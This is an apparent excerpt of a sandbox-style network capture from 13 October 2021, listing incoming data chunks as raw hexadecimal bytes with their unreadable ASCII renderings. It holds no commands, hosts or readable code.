                                2021-10-13 14:54:49 UTC87INData Raw: 5b 69 82 0d d9 ec 0d a2 83 9b e8 99 8f 26 8e d1 8e 56 fd 46 e2 80 a9 4a 26 1c f3 2a a8 0e cb a4 45 f1 9c f1 db 44 ff af 1b c4 39 c2 f2 86 0b 4b 06 1c c5 d2 e3 e0 c9 dd 9a b3 d3 6f ac 90 32 4d 88 df 1c a9 64 ce 36 ec 20 f1 3f 97 6f fd da 7d 03 52 fc d9 a1 c3 e1 89 30 47 86 a6 ac 59 a2 5f 8f f6 a2 85 b2 8b 81 25 b1 83 24 08 a7 c2 af 43 20 b3 8f 4e de 1f 8e 76 d3 9c 72 53 86 7e ff 4a d0 b9 72 a7 ff 98 fc e5 27 d2 ec d9 fd 2c 33 10 bc d0 02 95 bd da 9f 95 28 52 be fb c3 46 22 fc fb 87 4d 1b 09 85 8c bd 38 63 a7 12 7c 03 77 aa 39 7d 04 bb 34 8c d9 1c ac 47 f2 d7 b1 e2 7e 1b 62 2f 47 d0 d1 af 5a 3a e5 7f 0a f2 4a 31 43 27 1a c7 ad 2b 80 c2 06 72 2d b4 9d 81 0f a2 8c 43 97 5b 01 82 81 78 58 85 7d d1 3c 30 92 46 30 a0 19 65 db ff 12 32 75 a6 4e 13 fa 8b 86 03 6c
                                Data Ascii: [i&VFJ&*ED9Ko2Md6 ?o}R0GY_%$C NvrS~Jr',3(RF"M8c|w9}4G~b/GZ:J1C'+r-C[xX}<0F0e2uNl
                                2021-10-13 14:54:49 UTC88INData Raw: ca 0f d8 93 64 76 b7 e0 a3 0a c7 f6 7a 1a 2b 52 3d 3a a1 43 c2 74 57 56 a4 d0 15 85 bd cc 48 7b 83 ed ab 37 85 b4 ad 54 27 b3 94 95 7d 1e 18 f0 5e e5 4d ef 77 0a e8 09 91 eb 02 d7 e2 d3 c5 d7 b7 b3 ca b3 6b 68 89 90 7b 6a 91 00 0a 94 cc a9 93 4b 77 5a c6 f3 8c 55 b7 62 ff d0 c7 c0 c4 e8 8a 4c c1 6b ce f1 05 44 b4 f6 d8 e8 29 0a 49 d9 43 fd 34 08 f6 0e ed 78 af 51 9d fa c1 7f 5d d1 b1 cd c0 00 d8 a1 d5 9d 72 83 18 07 c2 6a 75 8b 14 2e 9a 03 bd 3d 35 93 3d 3f 91 1b 6f 66 94 3e 44 8a 30 42 5b 59 d6 8e 12 ea 83 a7 4b eb d5 17 25 2a c7 ae c9 2d 89 94 e1 2a 85 e1 2a 61 fb 4f 4f c2 7b 3d a7 87 a7 40 07 8e 8e 0a 85 af fc 0d be 81 96 54 57 23 02 a9 b3 d6 9a 24 3c e2 30 d6 48 75 ef 90 b0 ca c1 c2 f1 4a 92 78 b1 7e 5f dd 33 a6 c8 43 eb 30 ab 35 42 56 73 40 41 5d 21
                                Data Ascii: dvz+R=:CtWVH{7T'}^Mwkh{jKwZUbLkD)IC4xQ]rju.=5=?of>D0B[YK%*-**aOO{=@TW#$<0HuJx~_3C05BVs@A]!
                                2021-10-13 14:54:49 UTC89INData Raw: 15 90 c3 02 ca 67 0e 13 47 80 4e 0b 8c d3 51 37 34 ac c0 92 4d 81 15 2e 0d 61 0b 0b f8 62 b6 c7 40 61 2a 4a 56 9d c5 a7 38 a0 c2 c3 b3 d6 64 7c 7c ff 67 dc 5f 25 22 c1 a5 9f 22 bd 4d 1f ca c6 0f 42 f3 ce ff b1 51 78 5d 8b bd 38 4a 12 1e ee 40 90 0d 93 7e 9c 35 ba 8f 9a 39 8a ba d3 83 b2 80 ec 50 e9 7c 0c 8f 0e 9c d9 35 84 56 e5 54 4e 71 a8 5f ce 8a 6f 44 62 61 39 b9 1c 0f aa 2d bc af 64 f4 b8 7a 46 d4 50 c6 7c 6a 92 72 4f 0f c7 57 1b dd 1e a8 71 ff 13 37 77 50 be a6 31 30 71 95 f8 6f d7 36 39 28 0d c9 dc fc 81 0d f7 8d 32 bc 64 b0 fc c9 e7 ed 7e 27 c6 8e 97 72 2f 99 7d 20 40 1a 40 5f 98 52 2f c2 88 8e 9f 39 b3 71 7b a3 50 b8 ff 1a a2 30 9e c8 bb 1b 4a ef f9 18 ff 7d 0b 7c 79 de bc 1f 1a 62 ba 32 70 b1 af c8 37 ea 3d ee ba 93 d5 e1 bc 45 dc ec f4 80 d4 22
                                Data Ascii: gGNQ74M.ab@a*JV8d||g_%""MBQx]8J@~59P|5VTNq_oDba9-dzFP|jrOWq7wP10qo69(2d~'r/} @@_R/9q{P0J}|yb2p7=E"
                                2021-10-13 14:54:49 UTC91INData Raw: 6c 9d ba 4a 13 ad b2 db 5a 0b b4 84 8a 80 4d 9c 37 87 f2 0a c6 e2 4b b1 d0 bd 5e 0e 88 f1 59 90 1f c2 bf 57 b3 3e ca d9 42 e3 91 49 d2 2b dc cb c3 29 4b 0d 04 aa 45 f1 f2 dc 86 32 b0 d3 63 c1 da 43 6f 80 f7 5f b8 6c d5 b2 1d 2c 9e 16 99 79 f6 ce 15 cd 44 ed d0 03 31 f4 28 e8 52 95 ac 09 fa be 50 9c 83 f8 93 9c 9d e4 a1 a6 55 36 0f cd 07 b8 95 37 33 29 cc f0 0a bf 91 ca b9 35 d3 86 74 d6 01 d5 ae a2 a7 ff 98 fd e5 27 d1 ec d9 fd 2c 33 10 8d d0 02 95 d3 1c 8e 9d 04 3e ac f9 c1 7f 75 93 ee 8c 5a c7 eb 8b 8e bd 3c 08 7f 17 68 14 67 b4 00 20 8a 0c 29 45 db 19 b9 70 48 fb a0 e5 6d 17 80 07 6b f7 ca b7 21 4e cb 72 9b e7 6d 11 69 cd 11 d6 a1 1b 8c b0 42 7a 05 9a b5 c0 07 b1 80 7a da 4e d7 9b 96 06 d3 95 6b e6 e6 22 e9 69 34 cf 35 78 bf 93 70 05 5f 74 40 3b bc e6
                                Data Ascii: lJZM7K^YW>BI+)KE2cCo_l,yD1(RPU673)5t',3>uZ<hg )EpHmk!NrmiBzzNk"i45xp_t@;
                                2021-10-13 14:54:49 UTC92INData Raw: d7 48 4d de 5c 7a 93 64 74 ad f5 b4 d8 5e 22 79 11 2e 05 fa 12 72 43 d3 7f 6e 1a 2a ab 1f 87 c7 22 53 7a 87 e0 ab 5f 85 b4 ad 3f 3e c5 81 97 7d 14 23 81 59 e5 f9 ff 73 79 6c 0b 91 f0 3c 85 ea eb 60 fe f5 b1 ca a8 70 72 93 63 f5 6f 9d 11 0e fe 06 27 24 7d 88 2a dc e1 86 5f 04 50 4f c1 39 c1 ea 98 50 45 d0 67 5d f3 06 8d 29 cf d2 e8 3a 7b 83 27 42 d5 23 13 cd 4f f7 6b af 53 f7 36 d9 81 58 fa c7 e5 c9 19 c1 ba dd ff 47 9a e6 0c c6 2e 5c 30 02 2c 94 70 e8 35 29 67 14 52 99 0a 62 5f d0 a6 57 84 3c 54 40 54 48 ad 0f 14 80 f0 8c fa d1 29 4c 45 d1 af d7 34 21 bf a4 22 e1 27 d4 60 d3 40 48 c8 b2 bc 9e 8d a7 53 76 41 9e f4 80 92 f7 24 da ed b9 45 5d 29 02 ab df fa 66 25 1a c3 49 5a 48 7f fe 8b d7 9d c9 c2 ea 68 cc 68 4f 75 5b 97 20 a3 ef 77 f1 32 b5 b0 6b 47 79 5d
                                Data Ascii: HM\zdt^"y.rCn*"Sz_?>}#Ysyl<`prco'$}*_PO9PEg]):{'B#OkS6XG.\0,p5)gRb_W<T@TH)LE4!"'`@HSvA$E])f%IZHhhOu[ w2kGy]
                                2021-10-13 14:54:49 UTC93INData Raw: 1c e1 52 06 72 5a 03 ca 60 1f 62 8a 8a 58 27 54 4d 2a d1 96 bd ce e9 31 97 3d 87 d3 29 24 35 43 5d b6 cd 52 7f 01 aa 5f b5 a0 8b 3a 8d af 14 b5 ad ae 54 d3 fa 13 5b 79 33 30 d7 89 b0 f4 30 52 c1 e9 e2 0f 32 f1 ce ff d6 79 7b 7d 91 c0 f4 ca 3a cf e8 3b 5a 25 3c 7b 8d 37 9a 88 8d a4 8a 1e d3 83 b2 fc fd 45 f9 93 99 8a 1f 98 de 3f c1 c7 1b ab b5 fd 1d 33 dd 9d b5 53 6a fd 19 81 d3 0d d1 f8 be d4 bc e3 d2 a4 55 a4 0d d5 71 6c 87 76 f5 60 45 47 10 cc e2 32 71 c3 13 4c 80 50 be a2 1b 7e 60 82 ff 68 e8 05 ef 2b 1a 31 cb 5d 84 15 fc 8c 21 be 8e 99 73 cb f0 ec 56 bc de 70 9c 4f 21 a6 57 b5 a1 18 3d 82 15 55 2b 4c 3e b0 8b 2d 88 e2 78 a3 2f 90 a5 1a aa 3a 8f d4 d9 22 61 b4 fb 1d 9e 5a 0a 50 67 f2 cb 64 d1 64 a9 3c 58 79 94 ce 26 e4 52 16 6c 97 d1 69 1d fa 9b f8 de
                                Data Ascii: RrZ`bX'TM*1=)$5C]R_:T[y300R2y{}:;Z%<{7E?3SjUqlv`EG2qLP~`h+1]!sVpO!W=U+L>-x/:"aZPgdd<Xy&Rli
                                2021-10-13 14:54:49 UTC95INData Raw: cc a2 e1 60 9f b0 73 a4 87 0d df 41 62 c9 90 99 99 73 b9 20 9b dc 65 f3 e0 4b a8 d5 a3 5d f0 71 f8 58 96 06 a4 c4 5e 9b e5 c2 c8 4f dd a9 59 c6 3f a7 b6 c6 09 41 2a 15 a1 50 f3 ee a0 9a a6 b1 d9 0a be d1 30 47 a4 dc 7f ba 69 ec cb 0c 20 f7 13 86 68 fb f0 28 cb 52 fa b2 e1 84 e3 f8 dd 56 8d a4 33 e0 c0 69 8f 8d 63 ea de 8d f5 ae 97 92 2b 1d 0a 1a a1 52 2a 2c 21 fc b7 e0 71 88 d3 99 71 43 8d 5c 0c 14 d0 bf 17 dc 2b 15 dc c3 36 db d5 94 eb 04 85 66 9f d6 14 03 c7 11 9f 94 38 6d b9 d1 68 6e 78 f6 d3 9c 5a cd 8e c0 e1 bf 3a 14 4a 03 77 2f 45 a1 11 21 6b d7 3c 9f c2 29 a4 7a 72 d9 de 30 7c 18 1b 40 4b d4 9d 9d 39 4d fa c6 0b f8 62 24 6a 23 14 c9 fb 67 50 99 cd 71 2d b4 99 92 1c a6 91 f1 c6 49 02 99 89 46 cd 94 62 ed 58 5d e3 78 38 b3 1c 6b b0 80 5a be 77 a6 44
                                Data Ascii: `sAbs eK]qX^OY?A*P0Gi h(RV3ic+R*,!qqC\+6f8mhnxZ:Jw/E!k<)zr0|@K9Mb$j#gPq-IFbX]x8kZwD
                                2021-10-13 14:54:49 UTC96INData Raw: f7 13 b8 52 52 4a e8 8b ec 93 64 43 b5 d9 8b de 48 da 09 4d 28 29 e7 40 a3 44 ae a6 7f 1e a2 d2 1b fa 26 0a 48 7f ad ea d8 1a b7 b7 a7 00 2f c0 ab 97 7d 14 30 b3 5f e1 6f 4c 72 79 aa 0e b9 6e 2b 96 ea ff c4 d7 db b3 ca bf 09 4b 9a 9d fe 39 9f 04 20 60 00 a9 99 63 cb 1d fe f0 8c 59 66 7c 52 d0 cd ba c4 84 3c ad c1 6f c3 e2 06 9c 3f f4 a0 e8 2b 77 e4 3b 43 f9 21 2f de 49 ec 6b 95 57 e6 f6 c1 7f 59 d6 c2 f3 c2 02 fa a7 dd ee 47 83 0e 70 06 2b 77 8f 1c 29 e3 9d f9 3f 31 9b 16 03 76 1b 65 4a d4 38 39 66 21 47 4e 56 79 a7 52 eb 81 51 ad eb d5 12 ef a2 d1 af cd 25 58 cc b7 28 f4 57 c9 61 ff 42 5c bf 4e b2 8d 83 a5 2d 33 5f 8e 00 83 cd 82 0d b9 f8 d5 b2 57 29 17 a3 bb 0d 98 24 32 c8 1e 9b 49 7f f4 96 b8 6d c3 c2 ff 60 a8 9d b1 74 73 89 33 dd 25 52 ee 25 28 0d 04
                                Data Ascii: RRJdCHM()@D&H/}0_oLryn+K9 `cYf|R<o?+w;C!/IkWYGp+w)?1veJ89f!GNVyRQ%X(WaB\N-3_W)$2Im`ts3%R%(
                                2021-10-13 14:54:49 UTC97INData Raw: 09 7c fe da f2 57 02 0c c1 1b 34 67 31 12 55 88 2b 97 43 d7 57 3a 8c ae cf 86 48 90 2a 73 0c 4d 02 05 67 58 b6 d6 44 6d fc ba 7b 97 c9 8c 47 60 87 c1 b5 b6 bb 79 7c ea 16 42 56 db 22 fc ab 81 9b 4b 5a 1f c0 d8 2d 16 f4 ce e4 c0 6b 86 5c bc ca f3 4c 6f f1 ec 3b 58 11 80 7f 8d 20 b9 88 60 a2 8e 25 c4 90 bd 22 ec 51 e1 a0 e1 8a 33 9a e3 38 82 34 e4 54 4e 59 b4 26 1c ba 6d 40 5e ee 12 b9 d1 0d d1 e9 a8 a4 74 e9 d1 a6 30 38 97 c6 7d 7d f8 b8 f1 48 0f 57 1b d1 25 ac 68 e3 16 31 29 c7 be a6 36 1a 72 ac 90 66 fc 27 2f b5 11 e9 d3 f5 ab 22 fc 8d 3f a7 b2 89 d0 cb fa 38 7e 27 f4 70 97 4e 2d b2 7f 0b 83 18 30 bf 98 5c be 4c 3f a5 75 3b 88 56 78 a3 2f ba e9 67 a0 31 9e dd af 06 1c bf f8 1f e1 81 79 2f 61 da b4 19 dd 63 ba 32 71 40 16 c8 37 e2 3b 31 bb 93 d5 6d 1f 0a
                                Data Ascii: |W4g1U+CW:H*sMgXDm{G`y|BV"KZ-k\Lo;X `%"Q384TNY&m@^t08}}HW%h1)6rf'/"?8~'pN-0\L?u;Vx/g1y/ac2q@7;1m
                                2021-10-13 14:54:49 UTC98INData Raw: 4c 20 6e 45 ab 33 52 cc 4d 71 2d ba ae cc 0d aa 99 62 2b 58 2d 82 9e 13 a1 97 7c d7 33 2c eb 74 32 a8 0b 84 be b9 69 7e cc a7 44 3d b1 90 8a 09 72 e9 3d e0 7e 0b 1a c6 7f c4 67 1d 1d 48 86 58 2b 59 29 50 1d 92 96 24 9a 55 95 35 94 f3 60 2d 10 77 75 39 c6 41 7d 3b c0 a8 62 30 91 36 8b 8f d7 4f ac 84 7e 6b f7 13 55 40 2f dd d1 8d 8a df 35 60 45 35 38 d8 02 db ce e6 f5 73 78 fc 90 c0 f4 9b 12 1a fd 2d 4f 09 ab e8 8d 31 bc 9e 8f a7 b9 d8 d2 af bd 3b f7 48 ed ae 1f 9a 1b 81 36 3c 96 1e 0c a1 ab 60 ae 24 16 8e 75 be 64 c2 17 92 17 16 c2 fc bc be 64 ff 2c a1 68 a3 95 df 7a 1d a5 aa f5 6a 4d 4b 08 df 34 b9 66 d8 ef 36 71 53 a6 b5 33 30 60 80 f3 9a fd 01 35 27 19 21 f5 13 82 15 fa 80 2b b9 9e b1 c1 cf e8 18 7f 0c d9 73 81 6d 8f ab 6c 0f a3 09 3f 8a 66 53 07 47 36
                                Data Ascii: L nE3RMq-b+X-|3,t2i~D=r=~gHX+Y)P$U5`-wu9A};b06O~kU@/5`E58sx-O1;H6<`$udd,hzjMK4f6qS30`5'!+sml?fSG6
                                2021-10-13 14:54:49 UTC99INData Raw: f4 0f a8 f7 b7 45 a9 28 3f ae c2 92 8b 25 36 ce 4b 61 48 7f fe 8b d7 9d c6 c2 ea 67 ce 84 b0 58 63 89 33 dd ce 53 ee 25 c9 30 69 56 79 55 e0 83 25 55 d2 bb f7 6d 9f b8 44 09 7b 0c f5 4a 0f a5 fc 1c 95 31 0a 49 59 d3 0a c1 fd 59 b1 c1 af 5b 23 05 0e 58 ba 07 c9 d5 4c 9a ef ca f5 87 e9 94 5f c6 28 cd c6 3a 08 67 11 06 d1 58 e3 e0 cb ac df a1 d2 65 d6 c5 32 36 92 f6 59 af ea 73 d5 a5 20 f1 34 86 6a f5 d8 17 cd 4a 02 dc a1 8a e1 89 e9 46 86 a6 35 c0 a3 44 9e 88 69 94 b7 90 e7 5a b0 af 29 08 a7 07 ae 43 20 11 27 dd f2 0c 8b 77 ca b1 57 ac 87 58 d4 07 c3 bc 78 a1 2c 0a c1 1b 26 fc c6 b5 fa 14 d6 99 60 2f 28 8e c0 02 af 90 2c 7c af f9 cb b6 78 fc ea 8f 21 dd 85 af 88 90 31 36 ad 16 7c 01 12 21 13 27 0e c1 4d e0 ca 0f a0 73 75 d8 89 37 7d 18 11 13 3e c0 da b1 34
                                Data Ascii: E(?%6KaHgXc3S%0iVyU%UmD{J1IYY[#XL_(:gXe26Ys 4jJF5DiZ)C 'wWXx,&`/(,|x!16|!'Msu7}>4
                                2021-10-13 14:54:49 UTC100INData Raw: 34 78 a3 2f e9 e8 11 74 21 9a cd fc 06 6a 6a f3 17 c9 85 02 3f 34 da be 6e 0d 65 90 36 72 2e 85 c8 35 e8 40 3e a7 b0 d1 65 0b 77 9c f8 c5 ab da 22 90 8c 17 ae bc 5a 4e d9 76 43 e8 6a 73 be f5 d0 e0 48 dc 7b 37 22 01 c3 38 a1 41 a0 fa 7d 1e ac aa 1d d7 a9 c3 49 7b 81 e0 f0 9a 85 b4 ad 48 07 53 a9 97 77 18 39 cf cf e5 47 f4 5b b9 ad 0b 97 f2 2e 90 8f 47 cd ff ff a2 cc 92 47 7f 9e b5 61 41 91 0a 1b ea 02 b8 96 20 56 37 d0 f8 a1 75 17 0a 41 d5 cf af 0c 92 41 4a ed 71 d6 e4 12 97 40 c5 d9 e8 2f 79 88 dc 38 e3 24 05 da 58 e9 03 81 52 e6 38 ae bb 58 d6 c4 d5 d0 06 fa 27 df ee 47 ac a2 d3 e4 39 71 75 08 18 9e 70 e2 50 62 99 15 74 4f 19 35 21 1e 3d 44 86 30 43 25 9c 58 a7 14 e8 d1 a7 8b ea d5 17 ba 7c d1 af c3 2e 29 ef ce 25 ff 2a 2e 49 67 44 5e ce af b0 dd fc aa
                                Data Ascii: 4x/t!jj?4ne6r.5@>ew"ZNvCjsH{7"8A}I{HSw9G[.GGaA V7uAAJq@/y8$XR8X'G9qupPbtO5!=D0C%X|.)%*.IgD^
                                2021-10-13 14:54:49 UTC102INData Raw: d4 76 72 3a 29 11 d6 af 35 4e b7 cc c7 42 17 b5 c0 07 bd 99 78 d3 59 10 8e 86 1d 22 85 51 d8 34 48 c4 79 32 a4 2a d6 bf 95 61 12 7c b5 42 3b ab 8f 99 1e 84 f5 ef f6 50 79 13 c5 02 ce 70 35 83 54 8a 52 35 5a b8 f8 31 96 b7 d5 9e 4a 93 3d 9c 0b 7e 1c e3 75 71 a2 c5 3a 79 03 bb 53 94 d9 82 b4 3c e8 68 b1 ad a2 63 62 e8 15 5d 4e 23 3d 2e a0 a4 f8 32 5b 70 1d c6 27 03 fc d1 fc d6 76 78 4c 96 df e1 b4 13 36 f6 39 27 03 92 7a 89 38 32 29 28 8b 38 24 d3 89 ae 3a 92 fd fe aa 15 94 09 8b ce 3d ab 1d 04 bb 4f 72 86 06 05 f1 61 41 65 ea 10 ba 67 2c d0 f8 b8 c0 b5 e2 d2 a6 6c 36 95 c6 76 78 e6 c5 5c 60 41 5c 04 ca 27 ae 62 de 17 28 50 ae bf 8a 30 26 62 80 f1 6a ef 2b 39 3e 1c 28 d4 2e 82 39 b4 8f 4e a4 9b b1 d4 d5 7d cd 7e 20 df 63 93 4f 28 a4 60 5b 3f 09 3e 83 87 19
                                Data Ascii: vr:)5NBxY"Q4Hy2*a|B;Pyp5TR5Z1J=~uq:yS<hcb]N#=.2[p'vxL69'z82)(8$:=OraAeg,l6vx\`A\'b(P0&bj+9>(.9N}~ cO(`[?>
                                2021-10-13 14:54:49 UTC103INData Raw: f4 80 92 e0 07 bb 89 a7 57 57 2d 7c 39 c0 e9 92 2f 29 dd 62 d0 48 6e fa 8b ce 70 c2 ee ec 60 a8 74 b0 74 73 9b 19 3d c0 52 e4 37 b8 d5 c2 56 73 48 25 9e 32 5d cc b9 f6 72 81 43 5a 34 92 0f a2 54 0c a2 96 8f bb c6 8d 26 80 c4 10 a8 4b 4b a2 ce b0 5a 35 1a f0 48 92 13 d9 50 5d b7 e0 cc a2 4e f4 87 5e ff ef c8 da c4 16 58 1f 00 aa 47 e6 f9 31 af 88 be d1 1e dc d2 30 49 84 98 c5 a9 64 ce a0 1f 24 f1 2f 9f 64 0e d9 2a df 50 87 d3 8c 86 e7 ed d6 6f 1c a0 22 e4 b9 45 e2 24 69 85 b8 91 e6 a0 b1 92 21 15 c8 f7 ae 6f 2d 05 6b 3d 1e e0 91 62 c8 b0 41 43 82 6b c4 ee d1 95 72 98 be 15 d6 ef 2b cf d0 8d fb 2c 28 60 84 2e 03 a2 d8 13 e4 9b 2d 79 a9 e6 e7 04 50 67 f9 8d 50 db 9a c0 25 bd 3a 14 70 01 78 07 70 a6 06 d9 05 97 3d 87 db 0b aa 6e 67 cd a0 1c 7d 34 06 13 3e de
                                Data Ascii: WW-|9/)bHnp`tts=R7VsH%2]rCZ4T&KKZ5HP]N^XG10Id$/d*Po"E$i!o-k=bACkr+,(`.-yPgP%:pxp=ng}4>
                                2021-10-13 14:54:49 UTC104INData Raw: 9e 39 a4 2e fe a1 25 b2 f6 c0 12 5e e3 c5 ac 10 65 ab e2 0c ed 83 1b 58 7c c5 40 65 fd 6e b9 66 65 43 9c c9 37 ec 59 1e a9 9b d1 7e 03 68 92 06 df b7 d2 2a 91 9b 10 c1 c9 5a 4e c2 6b 1c 80 6c 72 af f9 ba cf b6 dd 56 17 38 2f fc 3d e2 28 2c 86 80 01 b2 c3 17 87 d7 02 54 85 86 c6 c8 0a d7 cf be 44 2f c4 bd d7 f0 e9 cf 4e 41 f6 4f fe 62 71 b3 29 6f e0 06 9a e4 c2 cb 90 69 b3 ca b3 65 4e 8b 95 f4 52 99 1f 04 11 00 85 98 5e c5 32 68 25 9f 5a 0a 57 43 d8 c7 d1 ce 8c 4a b2 c0 43 d7 e4 05 84 3d 52 6f 87 70 71 99 d3 48 e6 29 16 d6 49 fd 70 b3 ad e7 10 c2 68 4a de c2 e2 ca 1f f6 4e dc c2 4f aa 1d 35 50 d7 88 74 34 3f 8d 40 fa 3f 49 99 15 7e 73 1b 65 5f c0 37 6f 9b 21 40 5d aa 58 8b 10 f2 8a dc 81 fd 2b 12 be 47 c6 a4 c9 20 33 41 b4 04 fc 01 28 4a 1c 49 5f ec 32 b0
                                Data Ascii: 9.%^eX|@enfeC7Y~h*ZNklrV8/=(,TD/NAObq)oieNR^2h%ZWCJC=RopqH)IphJNO5Pt4?@?I~se_7o!@]X+G 3A(JI_2
                                2021-10-13 14:54:49 UTC105INData Raw: d2 7d 1b f0 7d 60 bf 26 3c d8 ae 48 45 b0 42 74 38 d0 86 cd 12 b3 95 63 d5 48 09 97 8b e9 dd a8 71 d0 28 39 a1 7e 33 a0 13 65 ac 86 69 0d 66 ae 5b 30 44 88 aa 00 73 eb db d6 b4 1d 11 d7 0a ca 77 15 07 a8 8b 74 2c 41 df 4f e7 be 36 c8 86 53 86 39 92 04 72 09 1d 65 55 a9 cd bf 76 2e b2 46 99 d8 b8 87 94 8c d2 b9 ad b9 74 63 f6 ed 5c 73 31 26 d3 a9 97 f8 e6 70 24 cb c7 2d 78 ea cf f5 c1 6f 76 4e 98 c0 e5 42 0f e4 ed 17 5b 0a 84 49 1d 2f af 96 9e b2 aa 39 c7 7d b9 0e ed 57 f6 b5 15 5d 37 13 ca 3d b0 08 1e b4 a4 60 a2 24 16 82 70 5b 9b ef 3e b0 14 1c d6 c9 82 b0 7c f0 da a0 55 a7 88 cf 82 6f d0 a5 f6 68 5e 5c cd f3 bf aa 62 c5 1c 28 57 43 b6 a6 26 38 6e 8a 10 65 d0 3c 3c 54 06 36 dd d4 96 7b bc 90 ca 55 65 ae df d8 f8 e6 6f 28 c5 8e 97 72 26 b1 77 23 28 1a 3b
                                Data Ascii: }}`&<HEBt8cHq(9~3eif[0Dswt,AO6S9reUv.Ftc\s1&p$-xovNB[I/9}W]7=`$p[>|Uoh^\b(WC&8ne<<T6{Ueo(r&w#(;
                                2021-10-13 14:54:49 UTC107INData Raw: 7e 4f 8a 1d eb 64 46 18 6f 7f 83 56 57 28 6e b1 c1 e9 9c 26 4d c4 70 d4 4c 76 e8 fb 53 8c c3 c8 dd 60 a8 74 b0 74 73 9d 4a b6 c3 52 ea 37 b7 be dc 39 28 42 3a 9a 07 5b b7 a6 f3 6d 8a b4 4d 77 15 0f d9 50 2b b5 98 47 b1 5d f4 28 8b d2 0e a8 64 49 a2 ce b9 20 1b 76 0e a6 69 d2 c7 86 6b 9b ef c4 f1 7c f5 87 50 18 39 de f0 c2 23 0a 10 04 aa 56 e2 e0 cf bc a4 b1 d3 d3 d3 d3 30 85 83 f7 59 a7 64 c4 ba 16 20 f1 3f 88 49 f2 d8 2e c8 52 fc d5 8d 86 f2 e4 f0 6c 9d a2 25 f9 51 5c a1 8f 71 8e b2 88 e3 5a b0 af 27 1d d7 09 a8 5b da 3c 14 c0 ca 1d a5 94 d9 cf 5b 53 86 70 fd 6a d2 91 6f b0 29 1f d4 fa 3d f8 7f 9e ff 26 11 84 9b d0 04 a6 7e 11 9f 9f 51 5e ac f9 cf 44 78 ef cb 89 5a 04 85 af 8c 5a 3a 1e 7d 04 6f 03 59 19 10 27 04 bb 2f 9b df f1 ab 53 60 ca a2 e6 7c 09 15
                                Data Ascii: ~OdFoVW(n&MpLvS`ttsJR79(B:[mMwP+G](dI vik|P9#V0Yd ?I.Rl%Q\qZ'[<[Spjo)=&~Q^DxZZ:}oY'/S`|
                                2021-10-13 14:54:49 UTC108INData Raw: 5a b2 a3 9f 39 a1 55 6c b7 0d 1b ff 1a a0 18 8f d9 ad 1a 6d bc ed 37 0a 87 0a 56 74 57 b9 64 d1 63 a9 32 62 3a 93 e0 c7 ec 46 38 18 82 d5 7b 1f 63 b4 5b de 9b d5 0a 21 8d 17 a4 4c 58 65 f0 73 07 bb 89 76 be f7 b3 51 4f dc 7a 1b 3d 3d f9 12 02 47 d3 73 6b 36 57 d4 1f 81 d0 87 4f 7b 87 eb cc 1d 93 9c 04 45 2f ca 83 22 7d 14 3a 99 ea e5 47 f4 49 17 53 f4 6e e6 3e be 12 d7 cf f9 e3 3c cd b9 7a 6c 8c 89 e0 6b 32 00 08 e5 29 f3 93 4f ca 3f 0e e2 a9 77 22 5a 50 da ca d6 cc bb 79 4c c1 65 19 e0 05 b8 3b dc d8 a9 37 71 99 d9 43 f9 25 05 de 49 ec 8b a4 53 e6 cf c0 7f 59 c6 c2 f3 c2 1a d2 b0 dc f5 7d 84 18 89 eb 2b 77 61 1e 3f 8f 58 0a 3b 35 9f 1f 7c e8 3c 64 4e d2 14 6b 80 21 4d 67 58 5b dc 35 eb 81 d8 ae db d5 13 98 63 d3 d4 ee 26 2b bb 9d dc fa 2a 2c 49 db 46 5e
                                Data Ascii: Z9Ulm7VtWdc2b:F8{c[!LXesvQOz==Gsk6WO{E/"}:GISn><zlk2)O?w"ZPyLe;7qC%ISY}+wa?X;5|<dNk!MgX[5c&+*,IF^
                                2021-10-13 14:54:49 UTC109INData Raw: b1 32 49 da 7d 27 f8 62 70 4a 27 10 d6 93 33 58 b1 4e 70 2d be b5 c0 0d a2 84 6b d5 59 45 88 99 17 f6 85 7d d7 59 32 e1 78 24 a0 13 7a bf 95 61 0d 75 a6 44 3b 31 88 86 09 62 f4 c3 e1 f1 03 1d c4 0e ca 66 1d 19 56 8a 58 21 42 d7 51 88 97 bd ca 1c 59 95 3d de 0f 61 01 0b 74 5d b6 c7 41 77 02 a0 67 94 cf 7e 38 8b 87 2d b1 ad b9 62 f1 d0 13 5d 5e 36 2a a3 19 88 f4 3a 4b 19 db c1 33 2d 75 cc f5 c3 67 f5 5a 90 c0 f5 59 1c 0b e2 2d 4d 04 31 6b 83 22 b3 8f 91 b7 b6 31 5e ac b8 22 fc 47 ee bb 0f 9d 08 04 d9 2d ad 33 bc ab b1 79 8c 35 17 9c ff 6c 7a ff 1d af 86 25 c0 f8 bc a5 b0 f1 d2 a0 5f 87 83 c6 7c 64 d4 9e f4 60 4b 22 09 db 34 b3 71 c6 0e 57 57 41 b7 28 80 27 a7 09 c5 64 fc 2c 2a 28 0b 3e cc d7 95 7a 5a 8f 35 a0 8b b6 c1 c2 7e 51 78 94 42 6c 1a 61 2d b2 7e 07
                                Data Ascii: 2I}'bpJ'3XNp-kYE}Y2x$zauD;1bfVX!BQY=at]Awg~8-b]^6*:K3-ugZY-M1k"1^"G-3y5lz%_|d`K"4qWWA('d,*(>zZ5~QxBla-~
                                2021-10-13 14:54:49 UTC111INData Raw: 8c ae 2d 1f 5e 8e 00 92 b8 da 57 a8 f4 c7 32 57 29 19 d5 82 e9 98 25 25 ce 76 aa db 7f fe 9e ac 97 c2 c2 f1 4e ff 6b b5 5c 7f 9a 31 a0 ad 92 ec 21 ac 92 dd 56 73 48 16 82 30 5d e4 a1 f7 6d 88 d2 9b 1a 85 07 b6 4f 0d a2 98 92 82 5b e0 e7 88 d2 00 c0 ca ae a1 c4 a9 34 b5 1e f0 53 f9 74 cb ae 56 90 fe c8 b6 22 f5 87 50 eb a6 16 d6 d5 0f 67 0b 15 ac 39 b5 e0 cf a4 78 b6 d9 bb c7 f6 18 7a 82 f7 53 b8 61 ec b0 09 20 f7 34 b3 41 f0 d8 0c 16 52 fa f7 8c 9a e3 f2 f9 47 9e a2 4f 6b af 51 8d 8d 69 85 b2 8f f5 a4 24 16 25 1f c6 09 af 42 3f 0d 30 c2 5b 1f 8e 77 34 b4 41 43 ae 7f d2 10 d6 ad 50 72 2b 15 dc cd 36 d0 c4 94 f2 52 aa 64 9f da 0e 87 d4 39 93 90 2c 7f ba 74 cc 6e 78 fd e8 8b 4b cb 92 87 81 b8 3a 18 ce 03 7a 13 75 b6 39 84 04 bb 34 b7 d9 0f aa 75 68 d5 c5 89
                                Data Ascii: -^W2W)%%vNk\1!VsH0]mO[4StV"Pg9xzSa 4ARGOkQi$%B?0[w4ACPr+6Rd9,tnxK:zu94uh
